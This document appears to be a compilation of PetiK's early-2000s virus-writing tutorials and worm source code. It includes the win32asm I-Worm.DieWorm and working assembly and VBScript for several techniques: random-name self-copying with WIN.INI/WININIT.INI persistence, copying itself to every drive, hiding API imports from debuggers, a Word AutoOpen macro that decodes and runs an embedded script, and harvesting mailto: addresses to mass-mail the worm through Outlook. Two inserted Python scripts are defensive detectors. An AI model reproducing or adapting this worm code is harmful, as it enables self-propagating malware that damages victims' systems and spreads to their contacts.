"N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", _
"f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", _
"x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/")

Erase bin
l = 0: i = 0: FileIn = 0: b = 0:
s = ""
FileIn = FreeFile

Open vsFullPathname For Binary As FileIn

sResult = s & vbCrLf


s = ""

l = LOF(FileIn) - (LOF(FileIn) Mod 3)


For i = 1 To l Step 3

Get FileIn, , bin(0)


Get FileIn, , bin(1)
Get FileIn, , bin(2)
If Len(s) > 72 Then

s = s & vbCrLf
sResult = sResult & s
s = ""
End If

b = (bin(n) \ 4) And &H3F


s = s & Base64Tab(b)

b = ((bin(n) And &H3) * 16) Or ((bin(1) \ 16) And &HF)


s = s & Base64Tab(b)

b = ((bin(n + 1) And &HF) * 4) Or ((bin(2) \ 64) And &H3)


s = s & Base64Tab(b)

b = bin(n + 2) And &H3F


s = s & Base64Tab(b)
Next i

If Not (LOF(FileIn) Mod 3 = 0) Then

For i = 1 To (LOF(FileIn) Mod 3)


Get FileIn, , bin(i - 1)
Next i

If (LOF(FileIn) Mod 3) = 2 Then


b = (bin(0) \ 4) And &H3F
s = s & Base64Tab(b)

b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF)


s = s & Base64Tab(b)

b = ((bin(1) And &HF) * 4) Or ((bin(2) \ 64) And &H3)


s = s & Base64Tab(b)

s = s & "="

Else
b = (bin(0) \ 4) And &H3F
s = s & Base64Tab(b)

b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF)


s = s & Base64Tab(b)

s = s & "=="
End If
End If

If s <> "" Then


s = s & vbCrLf
sResult = sResult & s
End If

s = ""

Close FileIn
EncodeBase64 = sResult

End Function
comment *
Name : I-Worm.DieWorm
Author : PetiK
Date : July 10th 2002

Language : win32asm
*

.586p
.model flat
.code

JUMPS

include useful.inc

api macro a
extrn a:proc
call a
endm
start:

get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA
get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetWindowsDirectoryA
add edi,eax
mov eax,'acs\'
stosd
mov eax,'renn'
stosd
mov eax,'exe.'
stosd
pop edi

copy_worm:
; push 0
; push edi
; push esi
; api CopyFileA

; push 50
; push edi
; push 1
; @pushsz "ScanW32"
; @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
; push 80000002h
; api SHSetValueA

push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset orgwrm
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp

push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi

push 0
push ebx
api GetFileSize
mov [size],eax

push 40h
@pushsz "Hello"
@pushsz "Hello"
push 0
api MessageBoxA

push 0
push 80h
push 2
push 0
push 1
push 40000000h
@pushsz "essai.txt"
api CreateFileA
mov [hvba],eax

@start_hex:
mov cnt,0
mov edi,offset dochex
push edi

@pushsz "e = e & """


push offset dochex
api lstrcat
pop edi

push 0
push offset byte
push 112
push offset dochex
push [hvba]
api WriteFile

push [hvba]
api CloseHandle

f_hex:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle

end_worm:
push 0
api ExitProcess
conv_hex:
PUSH ECX
PUSH EDI

XOR ECX, ECX


MOV CL, AL
PUSH ECX
SHR CL, 04h
LEA EDI, Tab_Hex
INC CL

@@Y:
INC EDI
DEC CL
JNZ @@Y

DEC EDI
MOV AL, BYTE PTR [EDI]
POP ECX
AND CL, 0Fh
LEA EDI, Tab_Hex
INC CL

@@X:
INC EDI
DEC CL
JNZ @@X

DEC EDI
MOV AH, BYTE PTR [EDI]
POP EDI
POP ECX
RET

.data
orgwrm db 50 dup (0)
cpywrm db 50 dup (0)
dochex db 112 dup (0)
hfile dd ?
hvba dd ?
byte dd 0
size dd ?
cnt dd ?
Tab_Hex db "0123456789ABCDEF", 00h

ends
end start
=== How to spread a worm ? ===
=== by PetiK (09/17/2001) ===

###################
#FIND SOME ADDRESS#
###################
The most difficult part of spreading a worm is finding addresses.
There are a lot of files on the computer which store addresses.
*.WAB file (Windows AddressBook):
---------------------------------
We can find this sort of file in the default value of
HKEY_CURRENT_USER\Software\Microsoft\Wab\WAB4\Wab File Name.
Look at the source of Win32.HiV coded by Benny to examine the mechanism.
For this sort of file, I use another technique. I create a vbs file in C:\.
This vbs file will search all the emails in the Outlook Address Book
and save them in a file in the WINDOWS or SYSTEM folder. This file is afterwards
scanned by the worm (look at the source of I-Worm.Passion or I-Worm.Rush).

*.HTM, *.HTML (Internet files):
-------------------------------
Windows is full of this sort of file but the problem is that they don't contain
a lot of addresses. The solution is to scan all *.HTM and *.HTML files in the
MSIE Cache Directory. We can use the API SHGetSpecialFolderPathA in the DLL file
SHELL32.dll (CSIDL 20h). We can use the registry too. The value is the following :
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache.

*.EML file (Outlook Express file):
----------------------------------
We can find some addresses in an email ready to send.
*This is the start of an eml file (Outlook Express)
From: "PetiKVX" <petikvx@multimania.com>
To: <victim@multimania.com> <= We have our address
Subject: Virus Spread
Date: Sun, 16 Sep 2001 20:54:11 +0200
MIME-Version: 1.0
To take this address, we search for the string "To: <" in *.eml and we take the address.

#################
#SPREAD THE WORM#
#################
I have imagined something to insert a virus/worm/trojan in a mail which already contains
an attachment. We're going to use *.eml files again.

This is the appearance of an EML file :

From: "PetiKVX" <petikvx@multimania.com>
To: <victim@multimania.com>
Subject: Virus Spread
Date: Sun, 16 Sep 2001 20:54:11 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0008_01C13EF1.BF420560" <= The string of the "boundary"

------=_NextPart_001_0009_01C13EF1.BF420560
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

This is a new virus <= This is the body of mail


<= We can add something (text, script ??)

------=_NextPart_000_0008_01C13EF1.BF420560
Content-Type: application/x-msdownload;
name="Winpopup.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Winpopup.exe" <= This is a first attachment
HGiAAAAAAAaACgAAAAAA5gUNADAcP4AAAAAA8wUFADAcQIAAAAAA+AUzADAcQoAAAAAAKwZpADAc
Q4AAAAAAlAYLADAcRIAAAAAAnwYJADAcvIAAAAAAqAYLADAcFIEAAAAAswYEADAcFYEAAAAAtwYF
ADAcFoEAAAAAvAYDADAcZYAAAAAACYABAAAAAAC/BgMAMAzcgAAAAAAKgAEAAAAAAMIGAQAwHKoB
AAAAABCAAQAAAAAAwwYfADAMAYAAAAAAA4AGAAAAAACMBC8AEBwBgAAAAAC7BBMAEBwCgAAAAADR

------=_NextPart_000_0008_01C13EF1.BF420560 <= Delete "--" at the end of the string
Content-Type: application/x-msdownload; \
name="virus.exe" |
Content-Transfer-Encoding: base64 |<= This is our virus that we want to attach.
Content-Disposition: attachment; |<= The file is, of course, encoded with
filename="virus.exe" |<= Base64.
---------------------------------
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu|
MzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
|--------------------------------
|
------=_NextPart_000_0008_01C13EF1.BF420560-- /
To attach a file this way, we must read the "boundary". Here it is the string
"----=_NextPart_000_0008_01C13EF1.BF420560".
We must delete the "--" after the last "boundary" before infection.
This way the mail will contain the second attachment.
Warning !!
We must add "--" before and AFTER the LAST "boundary" to mark the end of the mail.

There we are !
If you have suggestions, please mail me at petikvx@multimania.com.
You can visit my website : http://www.petikvx.fr.fm
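As an added defensive example (not PetiK's code, and not part of the archive): a Python triage script for the MIME layout shown above. It decodes every attachment of a constructed sample mail, flags executable content by declared type, by extension and by the MZ header regardless of the declared name (the Calli macro earlier on this page attaches a ".doc" with Content-Type application/x-msdownload), and reports whether the body still ends with the closing "--" marker this article discusses. The sender and recipient names, the boundary value and the attachment bytes are constructed; the parsing relies on the Python standard library's email package.

```python
"""Added defensive example: triage an .eml for a smuggled executable attachment."""
import base64
import email
from email import policy
from email.errors import CloseBoundaryNotFoundDefect

# Declared types and extensions that mean "this attachment is a program".
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-dosexec",
                    "application/vnd.microsoft.portable-executable"}
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "hta"}

BOUNDARY = "----=_NextPart_000_CONSTRUCTED"  # constructed, not a captured value
# Constructed stand-in for an attached program: only the MZ magic is realistic.
FAKE_EXE = b"MZ" + b"\x00" * 58 + b"constructed sample, not a real program"


def build_eml(terminated=True):
    """Constructed sample in the layout shown in the article: a text part plus an
    attachment declared as a .doc whose bytes start with MZ.  With
    terminated=False the closing "--" after the last boundary is left off."""
    closing = "--" + BOUNDARY + ("--" if terminated else "")
    return "\n".join([
        'From: "PetiKVX" <sender@example.invalid>',
        "To: <victim@example.invalid>",
        "Subject: Hello You...",
        "MIME-Version: 1.0",
        "Content-Type: multipart/mixed;",
        '\tboundary="%s"' % BOUNDARY,
        "",
        "This is a multi-part message in MIME format.",
        "",
        "--" + BOUNDARY,
        'Content-Type: text/plain; charset="iso-8859-1"',
        "Content-Transfer-Encoding: 7bit",
        "",
        "Hello my friend, this is a funny file for you",
        "",
        "--" + BOUNDARY,
        'Content-Type: application/x-msdownload; name="Only_For_You.doc"',
        "Content-Transfer-Encoding: base64",
        'Content-Disposition: attachment; filename="Only_For_You.doc"',
        "",
        base64.b64encode(FAKE_EXE).decode("ascii"),
        "",
        closing,
        "",
    ])


def scan_attachments(raw_eml):
    """One finding per attachment: filename, declared type, decoded size and the
    reasons it looks like a smuggled program (an empty list means nothing found)."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename()
        if name is None and part.get_content_disposition() != "attachment":
            continue  # the message body, not an attachment
        ctype = part.get_content_type()
        data = part.get_payload(decode=True) or b""
        ext = name.rsplit(".", 1)[-1].lower() if name and "." in name else ""
        reasons = []
        if ctype in EXECUTABLE_TYPES:
            reasons.append("executable-content-type")
        if ext in EXECUTABLE_EXTS:
            reasons.append("executable-extension")
        if data.startswith(b"MZ"):
            reasons.append("pe-magic")  # holds regardless of name or declared type
            if ext and ext not in EXECUTABLE_EXTS:
                reasons.append("name-hides-executable")  # e.g. a ".doc" carrying MZ
        findings.append({"filename": name, "content_type": ctype,
                         "size": len(data), "reasons": reasons})
    return findings


def has_unterminated_multipart(raw_eml):
    """True when the body never ends with "--boundary--": the stdlib parser
    records a CloseBoundaryNotFoundDefect on the multipart container."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    return any(isinstance(d, CloseBoundaryNotFoundDefect) for d in msg.defects)


if __name__ == "__main__":
    for finding in scan_attachments(build_eml()):
        print(finding)
    print("unterminated:", has_unterminated_multipart(build_eml(terminated=False)))
```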
=== Some Practice Technics ===
=== by PetiK (02/10/2002) ===

###############
#Introduction:#
###############
This article presents some techniques that I use for my worms. I don't code
as well as other coderz (Benny, GriYO, Bumblebee, etc...) but I want
to show what I know how to do. Each part is accompanied by its source code.
Summary: I: Hide a copy of the worm
II: Spread a worm into different drives
III: Extract APIs from the KERNEL32.DLL library
########################
#I:Hide a copy of worm:#
########################
When I read a new worm description, I note that it uses a static name
like services.exe (XTC), winmine.exe (Chainsaw), wsock2.dll (Icecubes).
It's practical because of the name, but it's practical for deleting the worm too.
So my idea was to change the name of the worm at each start. How ?? Easy.
First: create a random name in the %windir% or %sysdir% directory :
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov al,"\"
stosb
api GetTickCount \ Thanx to Benny for this
push 9 |
pop ecx |
xor edx,edx |
div ecx |
inc edx |
mov ecx,edx |
copy_g: |
push ecx |
api GetTickCount |
push 'z'-'a' |
pop ecx |
xor edx,edx \
div ecx ---- Example of random name:
xchg eax,edx / jwvv.exe, abgqlbg.exe, slb.exe
add al,'a' |
stosb |
api GetTickCount |
push 100 |
pop ecx |
xor edx,edx |
div ecx |
push edx |
api Sleep | If we don't sleep the name look like:
pop ecx | ggggggg.exe, hhhhhhhh.exe uuuuuuu.exe
loop copy_g |
mov eax,"exe." |
stosd |
pop edi /

Second: Put the original name into Wininit.ini to delete it at the next start:
@pushsz "C:\WINDOWS\WININIT.INI" \
push offset orig_name | [rename]
@pushsz "NUL" >--- NUL=orig_name
@pushsz "rename" |
api WritePrivateProfileStringA /
Third: Copy of the worm:
push 0
push edi ; copy name
push esi ; original name
api CopyFileA
Fourth: Register the name into Win.ini to activate it at the next start:
push edi ; copy name
@pushsz "RUN"
@pushsz "WINDOWS"
api WriteProfileStringA

-----------------------source-----------------------
.586p
.model flat
.code
JUMPS

api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov al,"\"
stosb
api GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
copy_g:
push ecx
api GetTickCount
push 'z'-'a'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'a'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop copy_g
mov eax,"exe."
stosd
pop edi

push 40h
push offset copy_worm
push edi
push 0
api MessageBoxA

push 50
push offset wininit
api GetWindowsDirectoryA
@pushsz "\WININIT.INI"
push offset wininit
api lstrcat
push offset wininit
push esi
@pushsz "NUL"
@pushsz "rename"
api WritePrivateProfileStringA
copy_w: push 0
push edi
push esi
api CopyFileA
run_w: push edi
@pushsz "RUN"
@pushsz "WINDOWS"
api WriteProfileStringA
end_worm:
push 0
api ExitProcess
.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
wininit db 50 dup (0)

end start_worm
end
-----------------------source-----------------------
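An added defensive example (not the article's code): a Python check for the two traces this technique leaves on a Windows 9x machine, a WIN.INI [windows] run= entry with a random-looking name and a WININIT.INI [rename] NUL= line queuing the previous copy for deletion. The INI contents are constructed; jwvv.exe and abgqlbg.exe are the article's own examples of generated names, and sysmon32.exe is a made-up benign entry.

```python
"""Added defensive example: spot the WIN.INI / WININIT.INI traces of a
self-renaming worm (run= entry with a random name, NUL= deletion of the
previous copy).  The sample INI contents below are constructed."""
import ntpath
import re

# The article's generator emits 1..9 random lowercase letters plus ".exe".
RANDOM_NAME = re.compile(r"[a-z]{1,9}\.exe")

WIN_INI = r"""[windows]
load=
run=C:\WINDOWS\SYSTEM\jwvv.exe C:\TOOLS\sysmon32.exe
NullPort=None

[Desktop]
Wallpaper=(None)
"""

WININIT_INI = r"""[rename]
NUL=C:\WINDOWS\SYSTEM\abgqlbg.exe
"""


def parse_ini(text):
    """Minimal INI reader that keeps duplicate keys: WININIT.INI may hold
    several NUL= lines, which configparser would collapse into one."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current].append((key.strip().lower(), value.strip()))
    return sections


def run_entries(win_ini):
    """Programs WIN.INI starts at logon: [windows] run= and load=.  Entries are
    separated by commas or spaces, so a path containing spaces would be split."""
    programs = []
    for key, value in parse_ini(win_ini).get("windows", []):
        if key in ("run", "load"):
            programs += [p for p in re.split(r"[,\s]+", value) if p]
    return programs


def pending_deletions(wininit_ini):
    """Files WININIT.INI will delete at the next boot ([rename] NUL=path)."""
    return [value for key, value in parse_ini(wininit_ini).get("rename", [])
            if key == "nul"]


def is_random_looking(path):
    """Name shape produced by the article's generator (short, lowercase letters
    only).  Legitimate short names match too, so treat it as one signal."""
    return RANDOM_NAME.fullmatch(ntpath.basename(path).lower()) is not None


def correlate(win_ini, wininit_ini):
    """One finding per run= program: random-looking name, and whether a file in
    the same directory is queued for deletion (the worm's previous copy)."""
    deletion_dirs = {ntpath.dirname(p).lower() for p in pending_deletions(wininit_ini)}
    return [{
        "program": prog,
        "random_name": is_random_looking(prog),
        "sibling_deletion": ntpath.dirname(prog).lower() in deletion_dirs,
    } for prog in run_entries(win_ini)]


if __name__ == "__main__":
    for finding in correlate(WIN_INI, WININIT_INI):
        print(finding)
```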

########################################
#II:Spread a worm into different drives#
########################################
One copy is good, many copies are better. In fact, we can create a sort of "backup"
of the worm on the different drives of the system.
It's easy to code this (too easy perhaps).

start_worm:
push 50
mov esi,offset orig_worm ; Take the name of the worm
push esi
push 0
api GetModuleFileNameA
spread_system:
call @lect
db "D:\",0 ; The different drives. We don't
db "E:\",0 ; use A, B because they are certainly
...... ; floppy drives.
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23 ; Number of drives 26-3=23
pop ecx
loop_lect:
push ecx
push esi
api SetCurrentDirectoryA
; test eax,eax
; jnz continue_spread
push 0
@pushsz "winbackup.exe" ; name of copy
push offset orig_worm
api CopyFileA
;continue_spread:
@endsz
pop ecx
loop loop_lect
end_spread_system:
-----------------------source-----------------------
.586p
.model flat
.code
JUMPS

api macro a
extrn a:proc
call a
endm

include Useful.inc
start_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
spread_system:
call @lect
db "D:\",0
db "E:\",0
db "F:\",0
db "G:\",0
db "H:\",0
db "I:\",0
db "J:\",0
db "K:\",0
db "L:\",0
db "M:\",0
db "N:\",0
db "O:\",0
db "P:\",0
db "Q:\",0
db "R:\",0
db "S:\",0
db "T:\",0
db "U:\",0
db "V:\",0
db "W:\",0
db "X:\",0
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23
pop ecx
loop_lect:
push ecx
push esi
api SetCurrentDirectoryA
push 0
@pushsz "winbackup.exe"
push offset orig_worm
api CopyFileA
@endsz
pop ecx
loop loop_lect
end_spread_system:
end_worm:
push 0
api ExitProcess

.data
orig_worm db 50 dup (0)
lect db 50 dup (0)
end start_worm
end
-----------------------source-----------------------

###########################################
#III:Extract API from KERNEL32.DLL library#
###########################################
A lot of disassemblers/debuggers (like W32DASM) can find the APIs used by a program.
And a worm/virus/trojan is a program.
With a normal program ("extrn API:proc"), the Import functions of W32DASM show
KERNEL32.CloseHandle
KERNEL32.CreateFileA
KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
KERNEL32.WriteFile
A user who debugs the program may suspect that the program creates or opens a file to write
something. We can hide KERNEL32.CloseHandle,
KERNEL32.CreateFileA and
KERNEL32.WriteFile.
How ?? By extracting the APIs from KERNEL32.DLL ourselves.
code section
------------
First: Open KERNEL32.DLL:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
Second: Use a macro to take the address of APIs:
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
Third: Extract the different APIs:
kern CloseHandle
kern CreateFileA
kern WriteFile

Fourth: Use the APIs:


call _ptkCloseHandle
...
call _ptkCreateFileA
...
call _ptkWriteFile
data section
------------
szCloseHandle db "CloseHandle",0
szCreateFileA db "CreateFileA",0
szWriteFile db "WriteFile",0
_ptkCloseHandle dd ?
_ptkCreateFileA dd ?
_ptkWriteFile dd ?

If we debug the program, the Import functions of W32DASM show

KERNEL32.GetModuleHandleA
KERNEL32.GetProcAddress
-----------------------source-----------------------
.586p
.model flat
.code
JUMPS

api macro a
extrn a:proc
call a
endm

include Useful.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm

kern CloseHandle
kern CreateFileA
kern WriteFile
prep_spread_worm:
push 0
push 80h
push 2
push 0
push 1
push 40000000h
@pushsz "C:\KernApi.txt"
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_txt - s_txt
push offset s_txt
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
.data
octets dd ?
szCloseHandle db "CloseHandle",0
szCreateFileA db "CreateFileA",0
szWriteFile db "WriteFile",0

_ptkCloseHandle dd ?
_ptkCreateFileA dd ?
_ptkWriteFile dd ?
s_txt: db 'Text file create with',CRLF
db 'APIs extract from',CRLF
db 'KERNEL32.DLL library',CRLF,CRLF
db 9,'PetiK',CRLF
e_txt:
end start_worm
end
-----------------------source-----------------------
#############
#Conclusion:#
#############

If you have some questions or suggestions, please mail me to petikvx@multmania.com.


=== VBS tutorial ===
=== by PetiK (05/05/2002) ===

#################
# Introduction: #
#################

I wrote this article after programming VBS.Xchange and VBS.Doublet (two VBS/DOC infectors).
There are three parts in this article.
- Hex Conversion : How to convert an ASCII file (a VBS into a Word module, for example).
- Spread with "mailto:" : spread a VBS worm with web files.
- Random Name Generator : To give a VBS worm/virus a new copy name at each start.
I succeeded in coding this without looking at other sources.
This sort of article is of course not for good coderz but for the newbies (NOT LAMERZ) and
all people who want to learn about WORM programming.

###################
# HEX CONVERSION: #
###################
Why convert a file to hexadecimal ?? For example to put it in a module of a Word document.
How to do this ??
1) Set fso=CreateObject("Scripting.FileSystemObject")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll ' Read all the file
fl.Close
2) For i=1 To len(virus) ' Take the size of the file
3) e=Mid(virus,i,1) ' Take one byte at a time.
e=Hex(Asc(e)) ' And convert it to hex. (P=50;e=65;...)
4) If Len(e)=1 Then ' If the hex value is < 10h we add a 0
e="0"&e ' Example : return (0Dh0Ah). We would get D and A.
End If ' So we add a 0 => 0D and 0A
5) f=f+e ' This part is for the length of the line in the module
If Len(f)=110 Then ' of the document (it doesn't support lines that are too long).
sp.WriteLine "e = e + """+f+"""" ' Here we put 110 characters:
f="" ' e = e + "...110 char..."
End If
6) If Len(virus)-i = 0 Then ' Here is for the last line if there are fewer than 110 characters :
sp.WriteLine "e = e + """+f+"""" ' e = e + "... 1 < number of char < 110..."
f=""
End If
So the source code :
************************************************************************************************************************
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set fl=fso.OpenTextFile(WScript.ScriptFullname,1)
virus=fl.ReadAll
fl.Close
set sp=fso.CreateTextFile("example_vbshex.txt",True,8)
sp.WriteLine "Attribute VB_Name = ""VirModule"""
sp.WriteLine "Sub AutoOpen()"
sp.WriteLine "On Error Resume Next"
sp.WriteLine "e = """""
For i=1 To len(virus)
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
If Len(f)=110 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
If Len(virus)-i = 0 Then
sp.WriteLine "e = e + """+f+""""
f=""
End If
Next

sp.WriteLine "read=dec(e)"
sp.WriteLine "Open ""C:\newvbsfile.vbs"" For Output As #1"
sp.WriteLine "Print #1, read"
sp.WriteLine "Close #1"
sp.WriteLine "Shell ""wscript C:\newvbsfile.vbs"""
sp.WriteLine "End Sub"
sp.WriteLine ""
sp.WriteLine "Function dec(octe)"
sp.WriteLine "For hexad = 1 To Len(octe) Step 2"
sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))"
sp.WriteLine "Next"
sp.WriteLine "End Function"
sp.Close
************************************************************************************************************************

And this is the result:

************************************************************************************************************************
Attribute VB_Name = "VirModule"
Sub AutoOpen()
On Error Resume Next
e = ""
e = e + "4F6E204572726F7220526573756D65204E6578740D0A5365742066736F3D4372656174654F626A6563742822536372697074696E672E46"
e = e + "696C6553797374656D4F626A65637422290D0A53657420666C3D66736F2E4F70656E5465787446696C6528575363726970742E53637269"
e = e + "707446756C6C6E616D652C31290D0A76697275733D666C2E52656164416C6C0D0A666C2E436C6F73650D0A0D0A7365742073703D66736F"
e = e + "2E4372656174655465787446696C6528226578616D706C655F7662736865782E747874222C547275652C38290D0A73702E57726974654C"
e = e + "696E6520224174747269627574652056425F4E616D65203D2022225669724D6F64756C652222220D0A73702E57726974654C696E652022"
e = e + "537562204175746F4F70656E2829220D0A73702E57726974654C696E6520224F6E204572726F7220526573756D65204E657874220D0A73"
e = e + "702E57726974654C696E65202265203D2022222222220D0A0D0A466F7220693D3120546F206C656E287669727573290D0A0D0A653D4D69"
e = e + "642876697275732C692C31290D0A653D48657828417363286529290D0A0D0A4966204C656E2865293D31205468656E0D0A653D22302226"
e = e + "650D0A456E642049660D0A0D0A663D662B650D0A4966204C656E2866293D313130205468656E0D0A73702E57726974654C696E65202265"
e = e + "203D2065202B202222222B662B222222220D0A663D22220D0A456E642049660D0A0D0A4966204C656E287669727573292D69203D203020"
e = e + "5468656E0D0A73702E57726974654C696E65202265203D2065202B202222222B662B222222220D0A663D22220D0A456E642049660D0A0D"
e = e + "0A4E6578740D0A0D0A73702E57726974654C696E652022726561643D646563286529220D0A73702E57726974654C696E6520224F70656E"
e = e + "202222433A5C6E657776627366696C652E766273222220466F72204F7574707574204173202331220D0A73702E57726974654C696E6520"
e = e + "225072696E742023312C2072656164220D0A73702E57726974654C696E652022436C6F7365202331220D0A73702E57726974654C696E65"
e = e + "20225368656C6C2022227773637269707420433A5C6E657776627366696C652E7662732222220D0A73702E57726974654C696E65202245"
e = e + "6E6420537562220D0A73702E57726974654C696E652022220D0A73702E57726974654C696E65202246756E6374696F6E20646563286F63"
e = e + "746529220D0A73702E57726974654C696E652022466F72206865786164203D203120546F204C656E286F6374652920537465702032220D"
e = e + "0A73702E57726974654C696E652022646563203D20646563202620436872282222266822222026204D6964286F6374652C206865786164"
e = e + "2C20322929220D0A73702E57726974654C696E6520224E657874220D0A73702E57726974654C696E652022456E642046756E6374696F6E"
e = e + "220D0A73702E436C6F7365"
read=dec(e)
Open "C:\newvbsfile.vbs" For Output As #1
Print #1, read
Close #1
Shell "wscript C:\newvbsfile.vbs"
End Sub
Function dec(octe)
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function
************************************************************************************************

The function "dec" converts in the opposite direction (hex string back to text).

#########################
# SPREAD WITH "MAILTO:" #
#########################
Now we are going to see how to spread a VBS worm without the Windows Address Book (aka WAB).
If we can't use the WAB, we can read old mail and take the e-mail addresses. But too bad, I don't code this
in VBS. Last solution: take the e-mail addresses from web files (htm, html, asp, etc.).

When we see a link that sends a mail when clicked, this is the code:

<A href="mailto:petikvx@aol.com">PetiKVX</A>

There is always this string: "MAILTO:". So! Fine!
We can scan all files to search for this string and pick up the e-mail address.

1) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then ' Take the good extension
' htm, html, asp, doc, xls
set htm=fso.OpenTextFile(fil.path,1) ' and open the file.
verif=True
allhtm=htm.ReadAll() ' Read all the file.
htm.Close

2) For ml=1 To Len(allhtm) ' Get the size.


count=0
3) If Mid(allhtm,ml,7) = "mailto:" Then ' Find the mailto: string.
counter=counter+1
mlto=""
4) Do While Mid(allhtm,ml+6+count,1) <> """" ' Scan the EMail until the '"' string.
count=count+1
mlto = mlto + Mid(allhtm,ml+6+count,1)
loop
5) sendmailto(left(mlto,len(mlto)-1)) ' Send the mail

And now, the code:


************************************************************************************************
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set mel=fso.CreateTextFile("spread_mailto.txt",8,TRUE)
counter=0
lect()
mel.WriteLine "#"
mel.Close
WScript.Quit
Sub lect()
On Error Resume Next
Set dr=fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
list(d.path&"\")
End If
Next
End Sub

Sub spreadmailto(dir)
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFolder(dir)
Set cf=f.Files
For Each fil in cf
ext=fso.GetExtensionName(fil.path)
ext=lcase(ext)
if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then
set htm=fso.OpenTextFile(fil.path,1)
allhtm=htm.ReadAll()
htm.Close
For ml=1 To Len(allhtm)
count=0
If Mid(allhtm,ml,7) = "mailto:" Then
counter=counter+1
mlto=""
Do While Mid(allhtm,ml+6+count,1) <> """"
count=count+1
mlto = mlto + Mid(allhtm,ml+6+count,1)
loop
mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">"

msgbox mlto
sendmailto(left(mlto,len(mlto)-1))
End If

Next
End If
Next
End Sub

Sub list(dir)
On Error Resume Next
Set f=fso.GetFolder(dir)
Set ssf=f.SubFolders
For Each fil in ssf
spreadmailto(fil.path)
list(fil.path)
Next
End Sub

Sub sendmailto(email)
Set out=CreateObject("Outlook.Application")
Set mailmelto=out.CreateItem(0)
mailmelto.To email
mailmelto.Subject "Subject of worm"
mailmelto.Body "Body of worm"
mailmelto.Attachment.Add (WScript.ScriptFullName)
mailmelto.DeleteAfterSubmit = True
mailmelto.Send
Set out = Nothing
End Sub
************************************************************************************************
In the spread_mailto.txt file we have this:
************************************************************************************************
1 <Petikvx@aol.com>
